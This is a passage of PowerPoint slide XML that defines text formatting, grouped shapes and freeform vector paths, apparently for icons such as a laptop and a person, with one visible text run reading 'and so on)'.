              <a:rPr kumimoji="0" lang="en-US" sz="1764" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1764" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>and so on)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8333089" y="4137189"/>
            <a:ext cx="2151316" cy="1156440"/>
            <a:chOff x="9348329" y="4001983"/>
            <a:chExt cx="1540724" cy="828216"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="Group 4"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9348329" y="4001983"/>
              <a:ext cx="1540724" cy="828216"/>
              <a:chOff x="9790145" y="3919039"/>
              <a:chExt cx="1263005" cy="678928"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="826" name="Freeform 6"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="9790145" y="4546798"/>
                <a:ext cx="1263005" cy="51169"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1282"/>
                  <a:gd name="T1" fmla="*/ 0 h 52"/>
                  <a:gd name="T2" fmla="*/ 0 w 1282"/>
                  <a:gd name="T3" fmla="*/ 25 h 52"/>
                  <a:gd name="T4" fmla="*/ 0 w 1282"/>
                  <a:gd name="T5" fmla="*/ 26 h 52"/>
                  <a:gd name="T6" fmla="*/ 0 w 1282"/>
                  <a:gd name="T7" fmla="*/ 27 h 52"/>
                  <a:gd name="T8" fmla="*/ 0 w 1282"/>
                  <a:gd name="T9" fmla="*/ 29 h 52"/>
                  <a:gd name="T10" fmla="*/ 1 w 1282"/>
                  <a:gd name="T11" fmla="*/ 30 h 52"/>
                  <a:gd name="T12" fmla="*/ 26 w 1282"/>
                  <a:gd name="T13" fmla="*/ 52 h 52"/>
                  <a:gd name="T14" fmla="*/ 1256 w 1282"/>
                  <a:gd name="T15" fmla="*/ 52 h 52"/>
                  <a:gd name="T16" fmla="*/ 1281 w 1282"/>
                  <a:gd name="T17" fmla="*/ 33 h 52"/>
                  <a:gd name="T18" fmla="*/ 1282 w 1282"/>
                  <a:gd name="T19" fmla="*/ 32 h 52"/>
                  <a:gd name="T20" fmla="*/ 1282 w 1282"/>
                  <a:gd name="T21" fmla="*/ 0 h 52"/>
                  <a:gd name="T22" fmla="*/ 0 w 128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52">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="25"/>
                      <a:pt x="0" y="25"/>
                      <a:pt x="0" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="25"/>
                      <a:pt x="0" y="26"/>
                      <a:pt x="0" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="26"/>
                      <a:pt x="0" y="26"/>
                      <a:pt x="0" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="29"/>
                      <a:pt x="0" y="29"/>
                      <a:pt x="0" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="30"/>
                      <a:pt x="1" y="30"/>
                      <a:pt x="1" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="42"/>
                      <a:pt x="13" y="52"/>
                      <a:pt x="26" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1256" y="52"/>
                      <a:pt x="1256" y="52"/>
                      <a:pt x="1256" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1268" y="52"/>
                      <a:pt x="1277" y="44"/>
                      <a:pt x="1281" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1281" y="33"/>
                      <a:pt x="1282" y="32"/>
                      <a:pt x="1282" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1282" y="0"/>
                      <a:pt x="1282" y="0"/>
                      <a:pt x="1282" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="002050"/>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827" name="Rectangle 7"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="9790145" y="4524749"/>
                <a:ext cx="1263005" cy="22049"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="0072C6">
                  <a:lumMod val="50000"/>
                </a:srgbClr>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sp>
            <p:nvSpPr>
              <p:cNvPr id="828" name="Rectangle 827"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9991361" y="3949032"/>
                <a:ext cx="866045" cy="541184"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                <a:noFill/>
                <a:prstDash val="solid"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91403" tIns="45701" rIns="91403" bIns="45701" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
                <a:prstTxWarp prst="textNoShape">
                  <a:avLst/>
                </a:prstTxWarp>
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="932318"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68217A"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="829" name="Freeform 5"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="9951557" y="3919039"/>
                <a:ext cx="943093" cy="605710"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 32 w 957"/>
                  <a:gd name="T1" fmla="*/ 614 h 614"/>
                  <a:gd name="T2" fmla="*/ 926 w 957"/>
                  <a:gd name="T3" fmla="*/ 614 h 614"/>
                  <a:gd name="T4" fmla="*/ 957 w 957"/>
                  <a:gd name="T5" fmla="*/ 582 h 614"/>
                  <a:gd name="T6" fmla="*/ 957 w 957"/>
                  <a:gd name="T7" fmla="*/ 33 h 614"/>
                  <a:gd name="T8" fmla="*/ 926 w 957"/>
                  <a:gd name="T9" fmla="*/ 0 h 614"/>
                  <a:gd name="T10" fmla="*/ 32 w 957"/>
                  <a:gd name="T11" fmla="*/ 0 h 614"/>
                  <a:gd name="T12" fmla="*/ 0 w 957"/>
                  <a:gd name="T13" fmla="*/ 33 h 614"/>
                  <a:gd name="T14" fmla="*/ 0 w 957"/>
                  <a:gd name="T15" fmla="*/ 582 h 614"/>
                  <a:gd name="T16" fmla="*/ 32 w 957"/>
                  <a:gd name="T17" fmla="*/ 614 h 614"/>
                  <a:gd name="T18" fmla="*/ 41 w 957"/>
                  <a:gd name="T19" fmla="*/ 36 h 614"/>
                  <a:gd name="T20" fmla="*/ 916 w 957"/>
                  <a:gd name="T21" fmla="*/ 36 h 614"/>
                  <a:gd name="T22" fmla="*/ 916 w 957"/>
                  <a:gd name="T23" fmla="*/ 575 h 614"/>
                  <a:gd name="T24" fmla="*/ 41 w 957"/>
                  <a:gd name="T25" fmla="*/ 575 h 614"/>
                  <a:gd name="T26" fmla="*/ 41 w 957"/>
                  <a:gd name="T27" fmla="*/ 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7" h="614">
                    <a:moveTo>
                      <a:pt x="32" y="614"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="926" y="614"/>
                      <a:pt x="926" y="614"/>
                      <a:pt x="926" y="614"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="945" y="614"/>
                      <a:pt x="957" y="601"/>
                      <a:pt x="957" y="582"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="957" y="33"/>
                      <a:pt x="957" y="33"/>
                      <a:pt x="957" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="957" y="13"/>
                      <a:pt x="945" y="0"/>
                      <a:pt x="926" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="0"/>
                      <a:pt x="32" y="0"/>
                      <a:pt x="32" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="0"/>
                      <a:pt x="0" y="13"/>
                      <a:pt x="0" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="582"/>
                      <a:pt x="0" y="582"/>
                      <a:pt x="0" y="582"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="601"/>
                      <a:pt x="16" y="614"/>
                      <a:pt x="32" y="614"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="41" y="36"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="916" y="36"/>
                      <a:pt x="916" y="36"/>
                      <a:pt x="916" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="916" y="575"/>
                      <a:pt x="916" y="575"/>
                      <a:pt x="916" y="575"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="575"/>
                      <a:pt x="41" y="575"/>
                      <a:pt x="41" y="575"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="36"/>
                      <a:pt x="41" y="36"/>
                      <a:pt x="41" y="36"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="002050"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr vert="horz" wrap="square" lIns="91403" tIns="45701" rIns="91403" bIns="45701" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
                <a:prstTxWarp prst="textNoShape">
                  <a:avLst/>
                </a:prstTxWarp>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="9323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000000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="837" name="Content Placeholder 2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07786" y="4059348"/>
              <a:ext cx="1033154" cy="655593"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="776" name="Group 37"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10734570" y="4174686"/>
            <a:ext cx="818269" cy="2341701"/>
            <a:chOff x="5893176" y="3792885"/>
            <a:chExt cx="585200" cy="1674708"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="777" name="Rectangle 630"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6132059" y="4189759"/>
              <a:ext cx="101114" cy="29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78" name="Freeform 631"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6048639" y="5401869"/>
              <a:ext cx="125129" cy="65724"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 21 w 42"/>
                <a:gd name="T1" fmla="*/ 0 h 22"/>
                <a:gd name="T2" fmla="*/ 0 w 42"/>
                <a:gd name="T3" fmla="*/ 22 h 22"/>
                <a:gd name="T4" fmla="*/ 42 w 42"/>
                <a:gd name="T5" fmla="*/ 22 h 22"/>
                <a:gd name="T6" fmla="*/ 21 w 42"/>
                <a:gd name="T7" fmla="*/ 0 h 22"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="42" h="22">
                  <a:moveTo>
                    <a:pt x="21" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="0"/>
                    <a:pt x="0" y="10"/>
                    <a:pt x="0" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="22"/>
                    <a:pt x="42" y="22"/>
                    <a:pt x="42" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="10"/>
                    <a:pt x="33" y="0"/>
                    <a:pt x="2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79" name="Freeform 632"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6188936" y="5401869"/>
              <a:ext cx="125129" cy="65724"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 21 w 42"/>
                <a:gd name="T1" fmla="*/ 0 h 22"/>
                <a:gd name="T2" fmla="*/ 0 w 42"/>
                <a:gd name="T3" fmla="*/ 22 h 22"/>
                <a:gd name="T4" fmla="*/ 42 w 42"/>
                <a:gd name="T5" fmla="*/ 22 h 22"/>
                <a:gd name="T6" fmla="*/ 21 w 42"/>
                <a:gd name="T7" fmla="*/ 0 h 22"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="42" h="22">
                  <a:moveTo>
                    <a:pt x="21" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="0"/>
                    <a:pt x="0" y="10"/>
                    <a:pt x="0" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="22"/>
                    <a:pt x="42" y="22"/>
                    <a:pt x="42" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="10"/>
                    <a:pt x="33" y="0"/>
                    <a:pt x="2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0" name="Freeform 633"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6092877" y="3929390"/>
              <a:ext cx="197173" cy="236355"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 59 w 66"/>
                <a:gd name="T1" fmla="*/ 45 h 79"/>
                <a:gd name="T2" fmla="*/ 23 w 66"/>
                <a:gd name="T3" fmla="*/ 74 h 79"/>
                <a:gd name="T4" fmla="*/ 6 w 66"/>
                <a:gd name="T5" fmla="*/ 30 h 79"/>
                <a:gd name="T6" fmla="*/ 46 w 66"/>
                <a:gd name="T7" fmla="*/ 5 h 79"/>
                <a:gd name="T8" fmla="*/ 59 w 66"/>
                <a:gd name="T9" fmla="*/ 45 h 79"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="66" h="79">
                  <a:moveTo>
                    <a:pt x="59" y="45"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="64"/>
                    <a:pt x="39" y="79"/>
                    <a:pt x="23" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="69"/>
                    <a:pt x="0" y="49"/>
                    <a:pt x="6" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="11"/>
                    <a:pt x="30" y="0"/>
                    <a:pt x="46" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="10"/>
                    <a:pt x="66" y="26"/>
                    <a:pt x="59"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1" name="Freeform 634"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6066334" y="3902847"/>
              <a:ext cx="194645" cy="221188"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 56 w 65"/>
                <a:gd name="T1" fmla="*/ 24 h 74"/>
                <a:gd name="T2" fmla="*/ 50 w 65"/>
                <a:gd name="T3" fmla="*/ 67 h 74"/>
                <a:gd name="T4" fmla="*/ 10 w 65"/>
                <a:gd name="T5" fmla="*/ 51 h 74"/>
                <a:gd name="T6" fmla="*/ 15 w 65"/>
                <a:gd name="T7" fmla="*/ 8 h 74"/>
                <a:gd name="T8" fmla="*/ 56 w 65"/>
                <a:gd name="T9" fmla="*/ 24 h 74"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="65" h="74">
                  <a:moveTo>
                    <a:pt x="56" y="24"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="40"/>
                    <a:pt x="63" y="59"/>
                    <a:pt x="50" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="74"/>
                    <a:pt x="19" y="67"/>
                    <a:pt x="10" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="3" y="15"/>
                    <a:pt x="15" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="0"/>
                    <a:pt x="46" y="7"/>
                    <a:pt x="56"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2" name="Freeform 635"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6132059" y="4108868"/>
              <a:ext cx="101114" cy="104906"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 80 w 80"/>
                <a:gd name="T1" fmla="*/ 64 h 83"/>
                <a:gd name="T2" fmla="*/ 40 w 80"/>
                <a:gd name="T3" fmla="*/ 83 h 83"/>
                <a:gd name="T4" fmla="*/ 0 w 80"/>
                <a:gd name="T5" fmla="*/ 64 h 83"/>
                <a:gd name="T6" fmla="*/ 0 w 80"/>
                <a:gd name="T7" fmla="*/ 0 h 83"/>
                <a:gd name="T8" fmla="*/ 80 w 80"/>
                <a:gd name="T9" fmla="*/ 0 h 83"/>
                <a:gd name="T10" fmla="*/ 80 w 80"/>
                <a:gd name="T11" fmla="*/ 64 h 83"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="80" h="83">
                  <a:moveTo>
                    <a:pt x="80" y="64"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="40" y="83"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="64"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80" y="6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3" name="Freeform 636"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6153546" y="4213774"/>
              <a:ext cx="56877" cy="399402"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 45"/>
                <a:gd name="T1" fmla="*/ 23 h 316"/>
                <a:gd name="T2" fmla="*/ 45 w 45"/>
                <a:gd name="T3" fmla="*/ 19 h 316"/>
                <a:gd name="T4" fmla="*/ 23 w 45"/>
                <a:gd name="T5" fmla="*/ 0 h 316"/>
                <a:gd name="T6" fmla="*/ 0 w 45"/>
                <a:gd name="T7" fmla="*/ 19 h 316"/>
                <a:gd name="T8" fmla="*/ 11 w 45"/>
                <a:gd name="T9" fmla="*/ 23 h 316"/>
                <a:gd name="T10" fmla="*/ 9 w 45"/>
                <a:gd name="T11" fmla="*/ 290 h 316"/>
                <a:gd name="T12" fmla="*/ 23 w 45"/>
                <a:gd name="T13" fmla="*/ 316 h 316"/>
                <a:gd name="T14" fmla="*/ 35 w 45"/>
                <a:gd name="T15" fmla="*/ 290 h 316"/>
                <a:gd name="T16" fmla="*/ 35 w 45"/>
                <a:gd name="T17" fmla="*/ 2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16">
                  <a:moveTo>
                    <a:pt x="35" y="23"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="45" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11" y="23"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23" y="316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="23"/>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4" name="Freeform 637"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5893176" y="4218830"/>
              <a:ext cx="214868" cy="558658"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 72 w 72"/>
                <a:gd name="T1" fmla="*/ 8 h 187"/>
                <a:gd name="T2" fmla="*/ 43 w 72"/>
                <a:gd name="T3" fmla="*/ 0 h 187"/>
                <a:gd name="T4" fmla="*/ 0 w 72"/>
                <a:gd name="T5" fmla="*/ 187 h 187"/>
                <a:gd name="T6" fmla="*/ 29 w 72"/>
                <a:gd name="T7" fmla="*/ 187 h 187"/>
                <a:gd name="T8" fmla="*/ 72 w 72"/>
                <a:gd name="T9" fmla="*/ 8 h 187"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="72" h="187">
                  <a:moveTo>
                    <a:pt x="72" y="8"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="5"/>
                    <a:pt x="53" y="3"/>
                    <a:pt x="43" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="60"/>
                    <a:pt x="6" y="121"/>
                    <a:pt x="0" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="187"/>
                    <a:pt x="29" y="187"/>
                    <a:pt x="29" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="123"/>
                    <a:pt x="45" y="66"/>
                    <a:pt x="72" y="8"/>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5" name="Freeform 638"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6260980" y="4218830"/>
              <a:ext cx="214868" cy="558658"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 72"/>
                <a:gd name="T1" fmla="*/ 8 h 187"/>
                <a:gd name="T2" fmla="*/ 28 w 72"/>
                <a:gd name="T3" fmla="*/ 0 h 187"/>
                <a:gd name="T4" fmla="*/ 72 w 72"/>
                <a:gd name="T5" fmla="*/ 187 h 187"/>
                <a:gd name="T6" fmla="*/ 43 w 72"/>
                <a:gd name="T7" fmla="*/ 187 h 187"/>
                <a:gd name="T8" fmla="*/ 0 w 72"/>
                <a:gd name="T9" fmla="*/ 8 h 187"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
